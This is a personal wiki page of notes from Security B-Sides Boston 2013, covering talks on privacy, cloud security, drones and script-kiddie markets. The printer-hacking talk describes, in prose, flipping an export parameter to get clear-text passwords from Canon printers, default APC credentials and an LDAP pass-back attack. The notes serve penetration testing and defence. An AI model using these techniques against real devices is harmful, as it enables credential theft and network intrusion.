Security B-Sides Boston - 5/18/2013

From srevilak.net
Revision as of 23:11, 15 February 2014 by SteveR (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

See http://bsidesboston.com/ and http://www.securitybsides.com for background on Security B-sides conferences.

Keynote: Privacy as Identity

Dr. Geer

The speaker works with a company called Inqtel. Inqtel is an investment firm whose funding comes by way of the US intelligence community. One of their companies was Keyhole, now Google Earth. They're headquartered in DC, with a local office in Waltham.

Technology changes very quickly. So quickly, that the implications of new technologies cannot be reflected in policy prior to adoption. Policy struggles to keep up. This isn't a bad thing. We live in a free society; you're allowed to do anything that isn't explicitly forbidden. The alternative is authoritariansm, where you're only allowed to do things that are explicitly permitted.

You don't need laws to prevent the impossible. But things that were impossible a few years ago are possible today. The rate of change isn't just about technology; it's about the implications of new technology.

There are around 25 congressional bills that deal with cybersecurity, most of which you wouldn't like.

We have so many laws that all enforcement is selective. See Harvey Silvergate's book Three Felonies a Day. Given our current laws, the average person commits three felonies a day, whether they realize it or not.

NSTIC: National Stratgies for Trusted Identies in Cyberspace. The people who wrote this legislation are concerned with attribution. They consider privacy a problem.

The internet was built on the end-to-end principle. The network is nothing more than a transmission mechanism; it doesn't enforce policy. All policy enforcement takes place at the endpoints.

When reading public policy documents, always start with the definitions. Most of the substance is in the definitions. The definitions will give you a good sense of what the rest of the policy is about.

At the moment, technology isn't out of our control. Someday, it could be.

Tomorrow night, 60 minutes will air a segment on reidentification technologies. It's worth watching. If you're unique in any way, then you can probably be identified.

The world's corpus of data is doubling every 30 months. This rate of increase surpasses improvements in storage, and improvements in bandwidth.

Punctuated Equilibrium: period of relative calm, punctuated by periods of rapid change.

Many of our security problems started when Microsoft included a free TCP/IP stack in Windows 3. They took an operating system that was designed for a single user, and exposed it to the rest of the world. On the internet, every sociopath is your next door neighbor.

In the last five years, vulnerability research has gone from being a hobby to a full time job. When it was a hobby, your "income" was recognition (for finding a new exploit), and new exploits were announced shortly after discovery. Today, exploit discovery is motivated by profit, and new exploits aren't announced as quickly. When you're paid to find exploits, you don't share.

Intrusion prevention is probably a lost cause. Intrusion toleration is a more tractible approach.

The US could corner the world market for cyber vulnerabilities if it wanted to. The cost to buy this things is barely a drop in the bucket. We should do this, and we should make all of the vulnerabilities public. This would empty everyone's warehouse of exploits. If we keep exploits secret, then other countries will too, and everyone will be sitting on their own little nuclear arsenal of zero-day vulnerabilities.

Many computer security laws only address what you've done; they completely ignore the issue of intent. That's a major departure from our legal tradition.

The practice of law is the search for analogy.

Denial of service attacks can be purchased rather cheaply.

Washington is relying on ISPs and other service providers to enforce their laws. They've deputized many of the companies, often against their will. Instead of deputies, service providers should be treated as common carriers.

Lately, there are been discussions about a potential back door in Skype. What motivation would Microsoft have for putting a back door in Skype. Some country probably insisted on it. That's the downside of doing business internationally; you'll have to conform to a lot of different laws.

Recording everything is cheaper than recording things selectively. To security professionals, "how long has this been going on?" is often more important than "who is doing this?".

According to the Cyber Security Confidence Index (?) risk tends to go up month over month, but the types of risks move around. This index is compiled from a list of surveys, solicited to security professionals.

Most firms don't know what data they have. If you don't know what data you have, then how do you go about protecting it?

The average zero-day exploit is in use for 300 days before becoming public knowledge.

The ability to observe is increasing rapidly. We can do facial recognition at 500 meters and iris recognition at 50 meters. We also have the ability to identify people by reading their cell phone acclerometers (we all walk a little differently). Once you have observability, how far is the leap to identifiability.

The speaker prefers the following definition of security: security is the absense of unmitigated surprise. Along similar lines, privacy is where you've retained the capacity to misrepresent yourself.

All security technologies are dual use. Any technology can be used for offsensive or defensive means.

What will you own in five years? You can't will (for example) your iTunes collection to a friend, because you don't own it. Your entire iTunes collection is licensed. Who owns your face? If all of your mail is stored in GMail, then who owns that?

The most important things are usually uninteresting. The most interesting things are usually unimportant.

Cloudy Weather: How Secure is the Cloud?

Dan Stolts

The speaker's web site is http://itproguru.com. He also maintains http://bostonusergroups.org.

This talk will focus on Microsoft Azure, but many of the issues we'll discuss are common to all cloud providers.

Thinking about putting your data in the cloud? Here are some factors to consider:

  • Confidentiality. Who can see your data?
  • Integrity. Once you've stored data in the cloud, how can you be sure it isn't changed?
  • Availability
  • Risk management and compliance

Moving data to the cloud involves some customer accountability. For example, you'll want to choose a better password than "password".

In a multi-tenant system, who can read your data? At the cloud provider, who has access to your data? There's inherently some level of trust involved.

Google's cloud policy: Your data is our data.

Microsoft's cloud policy: Your data is your data.

Windows Azure complies with SSAE-16, EU-US Safe Harbor, ISO 27001:2005, and several other certification programs. See the Windows Azure Trust Center for more information about Microsoft's privacy, transparency, and compliance policies.

When you store data with a cloud provider, you need to understand their policies, and you need to decide whether (or how much) you trust them.

Security considerations:

  • Physical data center security and monitoring
  • Network. Firewall and packet filtering. Azure does automatic, on the fly network changes as new systems are spun up. This prevents tenants from accessing each other's network segments. Tenants should not be able to tweak network security settings.
  • Host. Azure dedicates specific cores to specific tenants. This prevents tenants from watching each other's CPU activity.
  • Applications. The issues of trust and policy apply when choosing applications, as much as they apply when choosing cloud providers.
  • Data and Database. Store keys and data in different places.

Is the cloud secure? Yes, if

  • You trust the cloud provider's certifications
  • You trust your users
  • You trust your cryptography implementations

Question: How do the security models differ between Amazon EC2 and Azure?

That's a long discussion, because there are a lot of differences.

Question: Does Azure's trust center allow you to store key encryption keys in an external service?

I think so, but I'll have to double-check.


Plunder, Pillage, and Print

Deral Heiland

This talk is about information discovery and extraction from embedded devices, such as printers, routers, switches, and power distribution units.

Embedded devices are plagued by security issues: default passwords are never changed, poor product design, lack of patch management.

What information can you obtain from embedded devices? The most useful things are: information about other network hosts, user credentials, and SNMP community strings.

See http://foofus.net

Pen Test Story #1. This story comes from a penetration testing engagement. We were trying to obtain A/D credentials from the client's network. The client was very proactive about security, and tried to follow best practices. Machines were all running current versions of windows, security patches were up to date, and users didn't have administrative access on their local machines.

We found a couple of (Canon) printers that still had default passwords. These printers were configured to use the client's active directory server. The printers also had several address books. These address books contained domain usernames, and clear-text passwords.

Why does a printer need an LDAP addressbook? Good question.

Canon IR address books store passwords in clear-text. Canon IRadv printers encrypt passwords during address book export. However, there's a configuration option to turn off the encryption. Aside from a configuration option, you can turn off encryption via HTTP POST. And address book export is a response to an HTTP POST to the printer's admin interface. The POST contains a parameter called enc. Changing enc=2 to enc=0 gets you clear-text passwords.

Lesson: if you have a multi-function printer, be sure to change the default password.

Pen Test Story #2. Our goal is to steal all of the client's Active Directory credentials, and use them to escalate our privileges.

Network file shares are a good place to collect information. Sometimes you'll find backup firewall configurations. Or, if you know the right community strings, you can extract configurations via SNMP.

APC devices can be a good way to obtain community strings. The default password is apc/apc, and many people forget to change it.

You should use different community strings in different security levels. For example, your office firewall and your APC PDU have different security levels.

APC devices are in every data center. If you hack into one, you have the ability to power down hardware.

Over the last few years of doing security engagements, we've found that embedded device vulnerabilities have become more common.

Pen Test Story #3. Newer printers have the ability to do LDAP authentication. If you can get into one of these printers, set up an `evil' LDAP server, and tell the printer that `evil' is its LDAP directory. Some printers will send clear-text passwords to `evil'. This is called a pass-back attack.

Sharp printers can be configured to use plaintext (LDAP) authentication. Unauthenticated users have the ability to make this change.

Leasing companies are an attack vector. Companies that lease printers also service them. These companies tend to use the same passwords everywhere. If you know a password that works at one site, it will probably work at other sites.

At the very least, multi-function printers will give you a list of usernames. Once you have this list, start searching through file shares. You'd be surprised at how often you'll find a document with passwords.

Praeda. Praeda is an embedded device information harvesting tool. See http://github. com/percx/praeda.

Praeda has profiles for around 72 devices, and we'd welcome contributions of new device profiles.

Question: Have you ever tried to get information out of data stored on the printer (e.g., the printer's hard drive).

We haven't tried. But you can get some interesting things out of scanners. Lots of offices provide employees with cheap personal scanners, and employees sometimes leave sensitive documents on the scanner bed. If you can get into the scanner, you can get a copy of whatever's on the scanner bed.

Most printers take firmware upgrades via the print port (e.g., port 9300), and none of them verify the integrity of the upgrades. With some manufacturers, it's very easy to embed malware in a printer firmware upgrade, and the printer is happy to let you install it.

Every device that plugs into your network has a web interface. That should be your first attack vector.

Security Change Call for Volunteers

Oliver Day

Security Change is a non-profit that does security consulting to agents of change. Who are agents of change? They're the people trying to make a difference in the world.

Our web site is http://securingchange.org.

Many non-profits don't have a security budget. They fall below the security poverty line.

Security change uses a "pay what you can" model. We're trying to lower the security poverty line. Many small non-profits have as many adversaries as large well-funded organizations.

We need volunteers in order to offer pro-bono security work. For example, to run automated vulnerability scans against the non-profit's web site, then sit down with the organization's director and explain the results. We need people to do this kind of work.

In the non-profit space, security issues often require creative solutions - not the typical things you'd do in a large corporation. For example, a robust backup strategy might be the most cost-effective countermeasure.

We also need incident response people (e.g., when an NGO's web site is hacked by an adversary). This is the most common security incident that we see.

We're planning to develop a backup service, inspired by the EFF's mirroring site. In version 1, we'll make a copy of your web site as static HTML pages. Version 2 will be a more thorough backup system.

We're also thinking about creating a security operations center, and offering forensic log analysis.

We started this organization in October 2012, and we have three clients so far. The mechanics of becoming a non-profit have taken a lot of time.

We have 14 volunteers. We're asking for minimum commitment of one hour per month.

We want to assign two volunteers per client, so they can cover for each other.

Question: Are there organizations that you won't work with?

Yes. Hate-based groups are out. Political groups are tricky. It depends on who volunteers do and do not want to work with.

If you'd like to volunteer, contact us at volunteer@securitychange.org.


Good Enough Isn't Anymore: the Value of Hitting Rock Bottom

Josh Corman

No one changes until the pain of maintaining inertia is greater than the pain of changing.

We spend a lot of money on signature-based anti-virus products, and those are becoming less and less effective.

State-sponsored espionage is very common to those in the security world.

We're getting better, but we're getting worse faster.

Burnout is becoming more and more common in the infosec world. The Maslock stress index measures fatigue, cynicism, and perceived self-efficacy. Infosec people are off the charts in the first two categories.

When protecting assets, it's important to consider replaceability (i.e., how easily can the asset be replaced). Credit cards are highly replaceable, yet we spend a ton of effort protecting them.

Our dependence on software and IT is growing faster than our ability to secure it. For example, the first SQL injection attacks appeared 14 years ago. SQL injection attacks are still a problem today.

A lot of embedded devices are directly connected to the internet, and completely unsecured.

Today, we have cars with vulnerable, unpatchable, operating systems.

Try this exercise for 24 hours: when talking, replace the word "software" with "vulnerability", and replace "connected" with "exposed".

Vendors don't need to be ahead of security threats. They just need to be ahead of the buyers.

HD Moore's law: the power of a script kiddie doubles every day.

When doing vulnerability assessments, the adversary makes all the difference.


The Future of Drones and the Impact on Infosec

Andrew Clare

We tend to think of drones as being for military use. In the next few years, expect to see more non-military uses. For example, searching for lost people (search and rescue), crop dusting, tracking weather, finding poachers, cleanup of nuclear disasters, journalism, and wildlife studies.

halab.mit.edu: human and automation labs.

Some research focuses on making it easier to humans to control unmanned vehicles. We're enhancing vehicle autonomy, but we're also increasing vulnerability.

There's research in operating UAVs in GPS-denied environments. For example, drones that can fly inside underground parking garages. The drone has to learn its way around. There's also research in miniaturization: flying drones that are the size of a quarter.

An expected time line for non-military UAV deployment:

  • Within 5 years: agriculture, low altitude photography
  • 5-7 years: Self-driving cars and passenger trains.
  • 10+ years: cargo delivery
  • 20+ years: unmanned commercial flights, personal flying cars.

Certification is a challenge. How do you certify complex automation systems? Who's ultimately responsible for what UAVs do? The operator? The computer? The company that developed the UAV? The engineer(s) that wrote the UAV software?

Infosec issues affecting UAVs:

  • GPS spoofing
  • Hacking control links
  • Supply chain security (who made the parts that were used to build the UAV?)
  • Interaction between unmanned vehicles
  • Relying on automation systems before we have the ability to secure them

Question: Are the precedents for UAVs technology systems?

Fly-by-wire might be a predecessor, but it's not quite the same. Fly-by-wire operates on a closed system. UAVs are exposed on standard networks.

Question: What about regulation?

The FAA is required to attempt to integrate UAV regulation by 2014. Some local communities are passing their own laws. As the technology becomes more popular, anti-UAV measures will probably become more widespread.

Question: What about other governments?

Many other countries are ahead of us in UAV implementation. For example, Canada, Japan, Russia, India, and the United Kingdom.

Comment: Cost savings was a huge motivation for the military use of UAVs. Keeping people out of risky situations was another motivation.

UAVs can be used to analyze networks. For example, by reading electromagnetic energy emissions from wires. There's a conflict of interest in UAV security. Security costs money, which goes against the goal of making low-cost UAVs.

Question: Why has there been more adoption outside the US than inside the US?

Regulatory factors are the biggest reason. We also have a more complex airspace inside the United States. Our military has done more work than other countries, but the military can control the airspace.

Comment: The NTHSB has asked for money to research vulnerabilities in automotive computers. A lot of technology is feature-driven, without being secure.

Three states allow autonomous vehicle testing. Some people jam the GPS systems in their cars. This would be a major problem for precision GPS systems in self-driving vehicles.


The State of Privacy and Proper Planning for the Future

Jeff Northrop

In 1890, Judge Louis Brandeis published one of the first articles about the loss of privacy to technology. Camera were the technology in question. Similar arguments were made with the advent of audio and video recording.

In 1967, Alan Westin wrote about the risks of privacy loss due to computers. He saw loss of privacy coming from data correlation. He also helped push forward the Privacy Act of 1974. In 1974, the main fear involved what the government would do with your personal data.

In 1998, we saw passage of the EU Data Directive. It's a set of suggested regulations that gives citizens a lot of control over their own data.

Forrester research produces a heat map of privacy laws. Europe is hot. The US is cold, on par with Russia, and only slightly warmer than China.

Today, we have a menagerie of privacy laws, both at the federal and state level. There are 25 congressional bills on the internet. Nearly all of them have some privacy component.

Question: How difficult is compliance with EU regulations?

It's an entirely different creature. The EU Data Directive was a framework, rather than a set of regulations.

Security and privacy does not equal compliance. For example, there's a social mobile app called Path. Path was mining data from mobile phone address books. The FTC issued a judgment against them, and Path has to undergo 20 years of regular privacy audits. Google Street view was fined $7 million, and required to do public education on security and privacy. Neither Path nor Google overtly broke any law, but they violated general expectations of privacy.

We've had advances in data analytics, and consumers feel they are losing control of the personal information. This is a source of tension, and there's no solution yet.

We share personal information in a lot of ways: phones, shopping cards, EZ passes. The primary uses of data are okay. Secondary and tertiary uses are the problem.

Comment: I think people are not paying attention to what they're doing, in terms of EULAs, etc.

Facebook actually gives you a fair amount of control, but not everyone takes advantages of those controls.

Question: How many people here read privacy policies?

Around 5 of 25 people raise their hands.

Comment: A key challenge with privacy policies is keeping track of third parties that you've shared data with, and being able to retract data from those third parties.

NIST 800-53 covers information security and privacy controls for government agencies. That might be relevant here.

On one hand, consumers fear the proliferation of their PI. On the other hand, technology makes it easier to store data, and to do analytics. PII is the fuel that makes analytics run. Reducing fear and allowing innovation to move forward is a major challenge.

To get privacy right, we need transparency and accountability.

What does a privacy program entail? Typically a Chief Privacy officer, a team, and a vision. Internal privacy teams are focused on risk management. This is a form of security management. Set your metrics, and measure how well you're doing.

Cyber insurance is useful. It can help you cover the cost of a data breach. You should have plans for resolving data and privacy breaches.

Question: Is the advancement of privacy complicated by customer misconceptions?

Meaningful transparency is the hardest part, and the most important part.


The Noob Persistent Threat

Allison Nixon and Brandon Levene

Some people just need a high-five. In the face. With a chair.

What is the Noob persistent threat? It's usually script kiddies. They're 14-18 years old, and the bottom feeders in the criminal landscape. They generally have a low level of technology skills.

There are web sites that sell DDoS services. Others will sell credentials, or root kits. Many of these are just scams.

Carder shops are market places to buy credit card numbers. Type "Credit Card CCV" in your favorite search engine, and see what comes up.

Booter shells are DDoS for hire sites. They're often used to target gaming web sites, or whatever your average 15 year old wants to get back at. Some booter shells use IaaS servers to amplify DDoS attacks. Oddly, nearly all booter shell sites accept payment via paypal. 70% of booter shells run on cloudflare.

It's not unusual for noobs to use booter shell sites to attack other booter shell sites. Question: can booter shells be used to attack smartphones?

Theoretically, yes. Practically, no.

See http://bit.ly/12iqEn1 for source code to one booter shell site.


Blucat: Netcat for Bluetooth

Joseph Cohen

The Blucat project was inspired by netcat.

Bluetooth URLs contain a protocol, a bluetooth address (which looks like a MAC address), and a channel number.

rfcomm is the most common protocol. b4spp, the bluetooth serial port protocol, is also common.

When probing, the first step is network discovery: what devices are in range, and what services are they advertising?

Once you discover a bluetooth address, you can scan the device's list of channels (there are around 30 of them). The device might offer services that it's not advertising.

We've found that some mobile phones accept AT commands over bluetooth.

Blucat is java based. It uses a popular bluetooth stack, and it's compatible with many devices.

Linux has a bluetooth stack called bluez.

Once you've paired an android phone, it's very easy to get a root shell over bluetooth. The lesson here: be very careful about what you pair with.

In cars, bluetooth connections are usually protected by trivial passwords, like "1111".